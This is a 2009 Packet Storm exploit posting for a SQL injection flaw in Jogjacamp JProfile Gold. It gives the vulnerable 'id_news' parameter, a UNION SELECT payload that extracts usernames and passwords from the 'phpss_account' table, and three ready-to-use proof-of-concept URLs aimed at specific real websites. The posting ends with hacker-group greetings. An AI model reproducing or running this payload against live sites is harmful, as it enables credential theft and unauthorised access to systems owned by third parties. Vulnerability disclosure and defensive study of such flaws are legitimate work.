Jogjacamp JProfile Gold SQL Injection

2009-03-05T00:00:00
ID PACKETSTORM:75414
Type packetstorm
Reporter kecemplungkalen
Modified 2009-03-05T00:00:00

Description

                                        
                                            `###############################################################  
  
__   
|__|__ ________ ____ ___________ ______ _ __  
| | | \____ \_/ __ \ _/ ___\_ __ \_/ __ \ \/ \/ /  
| | | / |_> > ___/ \ \___| | \/\ ___/\ /   
/\__| |____/| __/ \___ > \___ >__| \___ >\/\_/   
\______| |__| \/ \/ \/   
  
  
  
###############################################################  
  
  
Jogjacamp JProfile Gold SQL Injection  
  
by kecemplungkalen   
  
Vendor : http://jogjacamp.com  
  
bugs : /index.php?action=news.detail&id_news=  
  
exploit : union select concat(username,0x3a,password),2,3 from phpss_account--  
  
POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--  
  
http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--  
  
http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--  
  
###############################################################  
  
greetz : Allah  
s3t4n and Paman aka Jack-  
my family  
and all Mainhack BrotherHood   
jupe crew jangan ngegame melulu :p  
  
`